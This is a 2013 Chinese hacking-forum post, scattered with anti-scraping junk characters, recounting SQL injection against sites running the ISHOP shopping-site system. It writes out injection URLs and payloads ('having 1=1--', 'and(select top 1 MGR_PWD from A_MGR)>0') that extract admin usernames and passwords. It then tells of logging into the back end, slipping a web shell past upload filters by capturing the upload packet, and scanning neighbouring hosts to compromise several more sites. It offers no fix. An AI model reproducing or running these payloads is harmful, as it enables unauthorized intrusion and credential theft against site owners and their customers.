找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2228|回复: 0
打印 上一主题 下一主题

ISHOP商场建站系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:40:38 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
发现一个注入点5 |/ E) {0 j/ E9 ^. ?4 Q
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI20120506105833895 o, Z1 q2 l, Q9 Y1 A( T

( r6 t' X# p# j- C习惯性的加’having1=1--
% K6 y, |& F: I, A- h& a
0 Y1 Z7 Q* t7 j9 khttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
+ w8 y! ~/ ]0 R+ D; i) P, |* x0 e5 A- E( G& n) E
0( P; i1 z" e! C! @
6 ]5 ~( I7 H7 A- D
爆出Diary_A.dl_Title(这时候很激动啊)& F, P% i2 U( Z# W: M0 {

: V! u1 r' g& i: G! q; A4 O那么继续
3 I  w2 h5 j' z; m& z( A0 thttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—0 M8 x1 d4 d  j  ]1 n6 }
6 x( z3 H, u2 E" v$ w" H
继续,一直爆下去( _1 @6 _% i  y  W4 A

/ [* Q" [6 \6 I爆到几个字段和表段 但是没找到需要的管理用户的字段) a% ^6 N$ y; x2 m, o, m# q
+ ?" i9 s7 }( p2 c* O
蛋疼了 怎么办 然后去后台登陆页看源码
3 T, U+ H7 k: _% m) E  N9 \9 L4 b0 \  w8 h1 R
0' a# y- \' W! [, S9 A5 K
" g- x7 Z9 O: {/ R
Input name= “ADUID”8 p' O' w" D* x
Input name= “ADPWD”2 m1 ?# E. z# ]; _4 l/ g

& Q: C- |* i0 X2 F6 y" d很幸运 找到了字段那就继续
& e7 D4 C' Z( p6 f找到之后开始爆用户
# [0 _# W9 h6 ghttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
4 ^! }( j0 Q2 J- Q5 G( L6 Y爆密码5 v  j5 ~) C; D# d# }- g4 X
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—9 u5 L" R* o8 O
测试了下 这个注入点只能爆到文章哪里的表
( G4 p/ W% Z% \: g% D. W9 d
. y  Z+ O* v0 K9 ]% O头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
* r/ d6 j. @. J- B0 s2 X& l$ A+ k# s% |2 @( K2 e/ f
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
7 j: G! ]2 }+ f8 L& R! C0 Z
& ]' ~* w. B1 T473( g$ j+ s/ w6 r3 _1 h4 Y6 w
, X$ j; \. Q) Z5 L
进后台
3 g! ^: \7 a$ P$ o  [8 ?+ a+ u) j
4 E$ D2 b- ?. z  y0 k, k; |; @
; f; K: N7 Z2 Z发现几个上传点 有的地方不能上传 而且防止恶意代码8 r: Q2 ^/ @1 M% U+ q& N

4 o! b1 y2 E: k2 |; K* b没办法 各种百度各种找大牛 找到一只好像可以突破的马1 i* W  U9 v2 b* P4 Q8 u
9 H% E0 F- `% A7 K0 @2 p

; M' C: J, L) K4 D- J% A( R! N$ b在系统管理那里直接上传 不过没有显示地址
+ ^/ [, m5 c; G* Z
* }/ s' W$ g  \% D+ `! r* X再上传一次 抓包 搞定OK" M& @  c4 @' p& b8 C' {7 t* A
* e: e% u, i' [# ~# O

6 i$ ~' `9 o+ i$ I% V2 L$ ~! n3 z3 z2 n
4725 m0 a9 c) I, l
- F6 n9 X# ~) ^9 C4 c! ]
晚上不行了 去睡觉。。。' ~; Q. E$ H' w2 K
第二天刚起床 闲的没事做继续日站吧
% Y3 l- J; ?% ?/ C( R$ c3 B4 m7 W
1 i8 Z' C' M# Z, M  F7 g" E) D找个站 就把这个站的旁c扫了下
6 l, T% c' r; }: A7 K# D
6 `+ C; L8 b$ ^" s5 U9 _发现c段也有一个购物站 ,然后还和这个站的模板差不多  @! T9 I& W7 F3 y$ t: v, a

% S6 \5 H3 F: m$ L0 W就找到会员登录口测试
2 c( T" S& `  O' I; ?9 {: d( k
, p9 ^: D; @+ }! Y4 J2 A! R'and (select top 1 MGR_UID from A_MGR)>0—9 N+ ~- t% ?' D
果断爆到了 这时候我很激动 通杀
8 M- n1 T; x9 S+ E4 }) a0 O- [; F2 ~  k
再次翻c段
9 P( R0 x/ J( x, Y4 M2 b  R0 d0 o" |& ~; d
翻出几个站 都成功拿下; t2 g/ Q4 E" Y8 p1 X

( @4 u. I0 J7 s( p9 g
! ^$ T, i% K) H( u. c
  J* b7 [9 b" s) q% Q/ c1 y1 Q- P修复方案:
1 M$ V' }, A- R他们比我专业
7 N  {, O+ d1 g! K( F* d2 f9 z# v6 ~4 k2 {  t/ g- Z% O# E8 ]0 d

8 W" s! R, Q" j2 b4 v, P$ N0 x9 x( L; j# c9 |- O
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表